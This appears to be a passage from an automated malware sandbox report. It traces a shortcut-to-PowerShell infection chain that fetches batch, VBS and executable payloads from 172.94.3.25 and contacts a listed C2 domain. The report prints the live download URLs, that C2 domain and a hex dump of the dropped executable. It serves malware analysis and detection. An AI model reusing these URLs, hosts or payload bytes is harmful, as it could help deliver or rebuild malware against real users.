                      Source: Yara matchFile source: 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DZIPR.exe PID: 5660, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED
                      Source: Binary string: msacm32.pdbUGP source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
                      Source: Binary string: msacm32.pdb source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
                      Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 00000010.00000003.2318798588.000000000278D000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.16.dr
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,16_2_0040301A
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_00402B79
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA4748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,17_2_6FA4748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C51748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,18_2_6C51748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,23_2_6FAC748E
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: fullimmersion777.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Length: 4809996Last-Modified: Wed, 25 Sep 2024 11:52:30 GMTContent-Type: application/x-msdownloadDate: Wed, 25 Sep 2024 16:40:27 GMTETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996"Accept-Ranges: bytesServer: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 7e f8 26 4c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 14 01 00 00 c8 01 00 00 00 00 00 ef 1d 01 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 02 00 00 02 33 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 50 01 00 b4 00 00 00 00 a0 01 00 04 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 13 01 00 00 10 00 00 00 14 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ea 30 00 00 00 30 01 00 00 32 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 29 00 00 00 70 01 00 00 08 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 04 8d 01 00 00 a0 01 00 00 8e 01 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec 81 ec 00 09 00 00 53 56 57 6a 27 e8 8a 0f 00 00 8b 75 08 ff 76 0c 8b 3d 60 32 41 00 ff 36 50 8d 85 00 f7 ff ff 50 ff d7 83 65 08 00 83 c4 14 83 7e 10 00 76 38 8d 5e 14 ff 33 8d 85 00 ff ff ff 68 10 33 41 00 50 ff d7 83 c4 0c 8d 85 00 ff ff ff 50 8d 85 00 f7 ff ff 50 ff 15 70 31 41 00 ff 45 08 8b 45 08 83 c3 04 3b 46 10 72 cb 8d 85 00 f7 ff ff 50 e8 2c 66 00 00 59 e8 8b 2d 00 00 6a 0a ff 15 74 31 41 00 cc ff 74 24 04 e8 6c ff ff ff cc 33 c0 39 05 e4 77 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 dc 77 41 00 ff 15 f4 32 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 18 00 83 7c 24 08 00 75 07 c7 40 18 01 00 00 00 33 c0 c2 08 00 8b 44 24 04 85 c0 56 8b f1 89 06 74 06 8b 08 50 ff 51 04 8b c6 5e c2 04 00 8b 54 24 04 56 8b 74 24 0c 8b c2 0f b7 0e 66 89 0a 42 42 46 46 66 85 c9 75 f1 5e c3 8b 4c 24 04 33 c0 66 39 01 74 08 40 66 83 3c 41 00 75 f8 c3 53 8b 5c 24 08 56 8b f1 43 3b 5e 08 74 4c 57 33 c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 b4 0a 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 88 0a 01 00 59 8b 46 04 89 3e 66 83 24 47 00
                      Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                      Source: global trafficHTTP traffic detected: GET /hello.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ffo.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /hi.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: global trafficHTTP traffic detected: GET /hello.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ffo.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /hi.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: DZIPR.exe.17.drString found in binary or memory: support@datanumen.com+https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm"Total page file memory: %.0n bytes!Free page file memory: %.0n bytes Total virtual memory: %.0n bytes equals www.facebook.com (Facebook)
                      Source: Dlr7HYI6VL.lnkString found in binary or memory: http://172.94.3.25/hello.bat
                      Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: DZIPR.exe.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
